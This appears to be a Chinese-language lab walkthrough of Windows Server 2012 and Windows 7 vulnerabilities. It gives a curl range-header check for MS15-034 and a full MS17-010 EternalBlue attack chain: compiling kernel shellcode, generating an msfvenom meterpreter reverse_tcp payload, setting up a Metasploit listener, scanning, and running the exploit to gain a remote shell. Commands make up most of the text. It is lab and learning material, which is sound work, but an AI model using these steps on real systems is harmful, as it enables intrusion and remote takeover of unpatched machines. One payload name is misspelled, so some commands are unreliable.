windows server 2012主机漏洞
目录
Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
先看服务器是否需要iis服务器,不需要 就不用处理此漏洞
复现
使用curl 工具 测试
curl http://192.168.68.200 -H "Host: 192.168.68.200" -H "Range: bytes=0-18446744073709551615"
出现Requested Range Not Satisfiable说明存在此漏洞
Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)
远程链接漏洞,有一方没有更新此漏洞 ,在远程连接是会显示身份验证错误
Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010)
使用kali,利用漏洞攻击靶机
129 的是win7的 200的是server2012的
靶机winserver 2012
靶机需要
-
关闭防火墙
-
打开来宾账号
kali需要
-
python工具(主要需要 impacket,pycrypto 模块)
-
nasm 是一款基于80x86和x86-64平台的汇编语言编译程序,其设计初衷是为了实现编译器程序跨平台和模块化的特性
-
eternalblue_kshellcode_x64.asm(Sleepya开发的内核shellcode)
-
ternalblue_exploit8.py(Sleepya开发的漏洞利用的python程序)
wget 或者xftp 拿到 eternalblue_kshellcode_x64.asm文件
#使用nasm 编译
nasm -f bin eternalblue_kshellcode_x64.asm
再使用msfVENOM生成一个用户的反弹shellcode攻击载荷
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.68.128 LPORT=9090
合并内核shellcode和payload
cat eternalblue_kshellcode_x64 meterpreter_msf.bin > metasploit_msf.bin
设置监听
msfconsole
#使用handler模块
use exploit/multi/handler
#设置载荷
set PAYLOAD window/x64/meterpreter/reverse_tcp
#设置攻击机ip 和端口
set lhost 192.168.68.128
set lport 9090
#攻击
exploit
再开一个命令窗口
python eternalblue_exploit8.py 192.168.68.200 metasploit_msf.bin 400
如果报缺少模块的错误
需要安装模块
#下载
wget https://files.pythonhosted.org/packages/23/18/611a288acba72f59dce509cc3e68fe390d3bdaa00ce4d0b4686e599c951b/impacket-0.9.12.tar.gz
#解压
tar zxvf impacket-0.9.12.tar.gz
#进入解压目录安装
cd impacket-0.9.12
python setup.py install
#同时还需要pycrypto模块
pip install pycrypto --index-url http://mirrors.aliyun.com/pypi/simple/ --trusted-host mirrors.aliyun.com
(pip是python的包管理工具 没有的 可以执行 apt-get install python-pip)
如果没有收到反弹的shell或者出现蓝屏重启,可以增加或减少数值
安装补丁
继续使用kali攻击 未出现蓝屏重启的情况
靶机 win7 x64
作为靶机进行攻击。
nmap 192.168.68.*
#扫描
#进入msfconsole
msfconsole
#查找ms17-010漏洞模块
search ms17-010
#使用扫描模块进行漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
#设置靶机ip
set rhost 192.168.68.129
#查看属性
show options
#开始扫描
run
可以看到 疑似存在 ms17-010漏洞 接着可以攻击
#使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
#设置靶机ip
set rhost 192.168.68.129
#查看属性
options
#攻击
run
可以看到已经获取靶机权限